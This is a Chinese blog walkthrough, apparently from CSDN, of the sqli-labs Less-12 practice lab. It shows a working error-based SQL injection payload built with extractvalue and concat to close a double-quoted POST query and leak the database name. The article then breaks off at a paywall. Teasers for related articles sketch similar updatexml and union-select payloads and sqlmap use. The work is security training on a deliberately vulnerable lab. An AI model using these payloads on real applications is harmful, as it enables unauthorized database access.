sqli-lab教程——Less-12 POST - Error Based - Double quotes- String-with twist (基于错误的双引号POST型字符型变形的注入)

最新推荐文章于 2023-03-22 22:32:02 发布
最新推荐文章于 2023-03-22 22:32:02 发布
阅读量746 收藏
点赞数
文章标签: 大数据 sql web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/luosaierdadi/article/details/125693647
版权
本文详细介绍了如何利用POST请求进行基于错误的SQL注入攻击,通过分析PHP源码和SQL查询语句,构造了闭合语句并实现数据库查询。实验中,通过不同payload展示了爆库、爆表、爆列以及爆值的过程,并提到了联合查询和奇淫技巧来获取信息。
摘要由CSDN通过智能技术生成

双引号报错型注入

按照题意应该是可以使用上一题的payload只需要修改单引号为双引号,但是实际测试不行,无论我使用--+还是%23还是#都不行,我就看了一下php文件:

可以看到sql查询语句:

@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";

构造一个能闭合语句而且会报错的payload:

admin"  and extractvalue(1,concat(0x7e,(select database())))  and " 

最终admin = "admin"  and extractvalue(1,concat(0x7e,(select database())))  and " "

传入后就变成了:
@$sql="SELECT username, password FROM users WHERE username="admin"  and extractvalue(1,concat(0x7e,(select database())))  and " " and password=($passwd) LIMIT 0,1";

前闭合,中间查询,后面报错,应该是这样没错了,实际测试没问题,可以回显,接下来就再concat()中构造查询语句:

爆库payload

最低0.47元/天 解锁文章
luosaierdadi
关注
第三节 Sqli-lab环境搭建-01
09-15
Sqli-lab环境搭建-01 在本节中,我们将讨论如何搭建Sqli-lab环境,包括安装PhpStudy环境、火狐浏览器插件、Sqlmap和Sqli-Lab等工具。这些工具将帮助我们学习SQL注入漏洞检测和利用。 PhpStudy环境安装 PhpStudy是...
SQLi LABS Less-12 联合注入+报错注入
热门推荐
wangyuxiang946的博客
06-21 1万+
sqli第十二关,sqli-labs less-12sqlilabs less12
sqli-less12题解详细过程
weixin_44352058的博客
04-22 917
sqli-less12题解 首先我们打开less12看一下 这个题目具有交互界面,有username和password,所以这里我们用不到bp进行拦截。那我们就开始找注入点。 1.在username和password 中都输入 admin 查看结果,可以正常登陆 1: username: admin password: admin 2.那就在username中输入 admin’测试 ...
sqli-labs:less-11/12 简单SQL注入和身份验证漏洞综合
Zeker62的博客
08-31 240
这两个靶场是一样的题,我就拿less-12说事了吧 首先,尝试胡乱输入密码进行测试: 发现存在报错,这时用admin和admin这个正确的账号密码进行测试(1~10前面的题目告诉了) 发现有着正确的提示: 但是还不够,我们尝试在username后面加上单引号: 发现正常报错 加上双引号尝试(没输入密码) 存在报错,这个就是SQL注入点:You have an error in your SQL ...
sqli-labs Less-12
qq_42630215的博客
03-26 257
Less-12 POST -Error Based - Double quotes - String - with twist Less-11 与 Less-12差别在于一个是单引号一个是双引号加括号,对于Less-12就直接用burp suite来做练习,步骤与Less-11基本一致。 0x01.原页面 用户名和密码两个参数分别为uname和passwd。Burp中提交参数uname=xxx&...
SQLI-LABS Less-11 到 Less-12
Web学习之路
03-22 273
联合注入
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs靶场练习笔记
最新发布
11-09
### SQLi-Labs靶场练习笔记知识点概览 #### 一、SQL注入基本概念与原理 - **定义**:SQL注入是一种常见的应用层攻击方式,它利用编程中的漏洞,通过在应用程序的输入框中插入恶意SQL语句来控制后端数据库服务器。 -...
sqlilabs less-11~12
TA不懒,但还没有添加简介
06-29 445
sqlilabs less-11
Less-12
m0_62094846的博客
12-26 186
双引号会报错,后面要加) 判断列数 有2列 判断回显位 (1)查库名 (2)查表名 (3)查列名 (4)查数据
SQLi-LABS Less-11&&Less-12
m0_64898960的博客
04-20 870
Less-11题目 使用bp抓包进行观察,得知这是POST注入 进行测试 猜字段数 获显示位 查数据库名 查表名 查列名 查列里面的内容 Less-12题目 Less-12具体做法和Less-11一样只不过闭合的姿势不一样而已 由bp抓包得知Less-12闭合的姿势是“ ") ” 然后按上面的步骤就好。 总结 从这里开始已经进入POST注入的专题 POST注入与GET注入 GET方式是在客户端通过URL提交数据,数据在URL中可以看到 POST方式的数据则放置在HTML HEADE
sqli_labs:Less-12 简要SQL注入-基于报错的变形双引号字符注入(配合Burp Suite食用更佳)
qq_43660551的博客
10-15 414
1.万能用户名、密码:admin。打开Burp Suite的代理准备抓包。 先登录,点Submit。 到Burp Suite看到抓包成功。 将数据包发送到Repeater,开始注入。 判断列名和字段数的方式与第一关相同,只是在BurpSuite进行。字段数为2。经尝试发现,在提交给数据库查询之前,源代码会自动给用户名和密码加上双引号和括号。 判断数据库名和版本号。 uname=1admin") union select version(),database() #&pass..
sqlmap进阶使用
weixin_43786406的博客
02-19 3398
一、以less-12为例,利用sqlmap实施sql自动注入,获取sqli-labs网站的登陆账户和密码。 1、利用burp suit抓取http://本机IP/sql/Less-12/的包,将拦截的报文保存到C盘根目录。 2、寻找注入点,获取当前网站数据库的基本信息 -r C:\a.txt --technique "U" -v 3 3、获取所有数据库的库名-r C:\a.txt --technique "U" -v 3 -dbs 4、获取当前网站所在数据库的库名-r C:\a.txt...
SQL注入SQLi-LABS Page-1(Basic Challenges Less1-Less22)】
小谢的博客
12-05 1875
本篇博客用于记录`SQLi`实验中第一阶段,即基础的`sql`注入,包括了GET和POST联合注入、时间盲注、布尔盲注、报错盲注、文件上传注入等并且内含一些笔者写的自动化注入代码~
sqli-labs less 12 POST -Error Based - Double quotes -String -with twist
Monster1m的博客
01-19 236
一、bp开启拦截,打开十二关点击submit,bp收到拦截的报文 二、send to repeater,然后打开repeater模块 三、先输入单引号发现页面没错误,然后输入双引号发现有错误信息,可以考虑使用报错注入 四、既然双引号报错了,然后添加注释符发现还是报错,再添加一个括号,页面显示正常,则闭合方式为") uname=1")#&passwd=&submit=Submit 五、先来判断当前数据库 uname=1") and updatexml(1,concat('^',data
Sqli-labs之Less-11和Less-12
→_→
04-02 1773
Less-11 POST - 基于错误的- 单引号- 字符 LOGIN ATTEMPT FAILED 登录尝试失败 从这一关的提示当中我们知道这是一个post的,那么post与ge...
(手工)【sqli-labs11-12POST注入:基本步骤、示例
07-07 1433
SQL-POST注入
MySQL注入实战指南——Sqli-labs教程解析
"MySQL注入天书——Sqli-labs使用手册" 这篇文档是关于MySQL注入技术的详细指南,特别关注于使用Sqli-labs进行实战练习。作者Lcamry在2016年编写了这份手册,旨在帮助读者理解和掌握SQL注入攻击与防御的相关知识。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值